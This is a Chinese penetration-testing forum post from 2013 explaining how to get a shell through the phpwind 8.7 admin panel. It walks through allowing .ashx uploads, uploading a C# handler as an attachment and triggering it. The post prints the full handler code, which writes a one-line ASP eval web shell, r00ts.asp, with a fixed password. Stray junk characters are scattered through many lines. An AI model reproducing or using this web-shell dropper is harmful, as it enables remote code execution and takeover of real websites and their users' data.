找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpwind 8.7 后台拿shell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2213|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小/ k, S" W+ F9 w

4 s# n9 H3 s& K& Q" d! [群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
, b. d9 w0 e# Q2 K/ Z 1 P. ~# \5 r1 \9 u. ~
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
9 k9 k  Y$ `$ s, _, |4 n, k # |( F4 T: n; z  W: Q
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx* Y' W- X5 V6 p6 T1 c6 e, N& M6 u6 Z
1 r2 y4 b, s8 v+ R
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts; I# c% T8 `6 J' D, t9 u

* o$ @0 M. j$ t下面是代码:
) ]& p1 ?( U7 P7 C + a& ]- A( l+ Y  F
<%@ WebHandler Language="C#"Class="Handler" %>
& p0 \, u5 Q/ R8 w# Yusing System;0 y4 f: g$ U; f( \( w7 A
using System.Web;
2 U+ D  F4 Z: |# Q6 ?5 Uusing System.IO;3 \) c5 ^& `# l% Z3 f; x( k4 D
public class Handler : IHttpHandler {$ |/ N) y; J) m: x; p4 d: _1 ~
public void ProcessRequest (HttpContext context) {+ j3 I8 [9 B" D# y7 ^/ b
context.Response.ContentType = "text/plain";7 a9 V; q  {$ R! R) u) J0 E- U
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));7 Q, k$ p- T+ p2 f
file1.Write("<%eval request(\"r00ts\")%>");
2 O  i" k0 S+ G  Sfile1.Flush();
, d9 x1 i7 k0 \7 M0 [! Y, ufile1.Close();
* Q" e, x, n! s; h6 o) G; m' e}
: q3 B+ Z' \+ Y$ `7 ppublic bool IsReusable {) e( p& r* T8 j* ?" T( W* H( B; ^0 c& H
get {8 l9 Y! L' @- I" A7 s1 F3 d; a2 b
return false;2 w7 K. j* ~2 p# G4 i
}9 S# |8 ?2 d+ H) N; k! S; {" L- A- f# a
}
" ~0 y% v/ o3 [2 Q* l. H}
& }1 ^, v' E. |% Z& n; t: t
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表